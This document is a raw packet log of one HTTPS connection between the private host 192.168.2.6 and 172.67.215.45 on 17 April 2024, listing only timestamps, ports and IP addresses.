Apr 17, 2024 08:39:25.468031883 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.468051910 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.468096972 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.468108892 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.468130112 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.468153954 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.469532967 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.469552040 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.469613075 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.469625950 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.469660044 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.471256971 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.471276999 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.471340895 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.471363068 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.471398115 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.472354889 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.472374916 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.472410917 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.472424030 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.472445011 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.472470999 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.473298073 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.473318100 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.473377943 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.473392010 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.473424911 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.475181103 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.475199938 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.475280046 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.475297928 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.475337982 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.476624012 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.476667881 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.476696968 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.476711035 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.476749897 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.476778030 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.477704048 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.477744102 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.477775097 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.477791071 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.477813959 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.477833033 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.478641987 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.478682041 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.478712082 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.478724957 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.478751898 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.478768110 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.480374098 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.480418921 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.480464935 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.480483055 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.480505943 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.480526924 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.481379986 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.481400013 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.481437922 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.481451988 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.481475115 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.481506109 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.483268023 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.483285904 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.483346939 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.483367920 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.483390093 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.483419895 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.484194994 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.484215021 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.484282970 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.484297991 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.484332085 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.485656977 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.485676050 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.485744953 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.485760927 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.485797882 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.486670017 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.486686945 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.486745119 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.486763000 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.486804008 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.503761053 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.503818989 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.503895998 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.503928900 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.504004955 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.504844904 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.504864931 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.504901886 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.504916906 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.504937887 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.504967928 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.505743027 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.505762100 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.505799055 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.505810022 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.505836010 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.505855083 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.506844044 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.506866932 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.506901026 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.506913900 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.506933928 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.506958961 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.508671999 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.508704901 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.508738041 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.508753061 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.508781910 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.508795977 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.509581089 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.509599924 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.509639978 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.509653091 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.509675026 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.509701014 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.511305094 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.511326075 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.511411905 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.511426926 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.511555910 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.511902094 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.511921883 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.511962891 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.511974096 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.511998892 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.512021065 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.513704062 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.513725996 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.513758898 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.513776064 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.513796091 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.513816118 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.514672041 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.514691114 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.514723063 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.514734030 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.514753103 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.514777899 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.516340017 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.516360044 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.516400099 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.516415119 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.516436100 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.516470909 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.517014027 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.517034054 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.517076969 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.517086983 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.517134905 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.518748045 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.518773079 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.518814087 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.518821955 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.518846989 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.518865108 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.519686937 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.519706964 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.519738913 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.519746065 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.519766092 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.519788980 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.521410942 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.521434069 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.521471024 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.521483898 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.521505117 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.521527052 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.522320986 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.522345066 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.522382975 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.522396088 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.522414923 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.522439003 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.523801088 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.523824930 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.523873091 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.523886919 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.523932934 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.524729013 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.524749041 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.524782896 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.524789095 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.524815083 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.524836063 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.526475906 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.526495934 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.526554108 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.526561975 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.526643038 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.527390003 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.527410984 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.527451992 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.527461052 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.527494907 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.527514935 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.529144049 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.529166937 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.529202938 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.529218912 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.529251099 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.529269934 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.529983044 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.530008078 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.530059099 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.530071020 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.530106068 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.531511068 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.531534910 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.531567097 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.531580925 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.531601906 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.531625986 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.532414913 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.532437086 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.532496929 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.532515049 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.532556057 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.534246922 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.534267902 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.534302950 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.534318924 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.534341097 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.534358978 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.535118103 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.535135984 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.535161018 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.535171032 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.535218000 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.536853075 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.536875963 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.536931992 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.536953926 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.536988020 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.537501097 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.537522078 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.537573099 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.537580013 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.537616968 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.539227009 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.539246082 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.539283037 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.539300919 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.539319038 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.539351940 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.540096998 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.540127993 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.540165901 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.540178061 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.540198088 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.540227890 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.541780949 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.541800976 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.541848898 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.541863918 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.541903019 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.542767048 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.542787075 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.542819977 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.542833090 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.542860031 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.542871952 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.544183969 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.544203043 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.544239044 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.544255018 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.544275045 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.544297934 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.545223951 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.545244932 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.545281887 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.545296907 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.545317888 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.545347929 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.546930075 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.546953917 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.546983957 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.546997070 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.547023058 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.547043085 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.547875881 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.547894955 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.547951937 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.547965050 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.548026085 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.548870087 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.548890114 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.548924923 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.548938990 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.548969984 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.548990011 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.550473928 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.550493002 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.550524950 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.550539017 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.550561905 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.550580978 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.551922083 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.551944017 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.552006960 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.552020073 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.552057028 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.552921057 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.552944899 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.552995920 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.553014994 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.553046942 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.553055048 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.554560900 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.554582119 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.554617882 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.554630995 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.554673910 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.554683924 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.555526972 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.555552006 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.555586100 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.555600882 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.555620909 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.555649042 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.556401968 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.556423903 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.556461096 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.556468010 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.556504011 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.556521893 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.557872057 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.557898045 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.557941914 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.557960987 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.557976961 CEST	49700	443	192.168.2.6	172.67.215.45
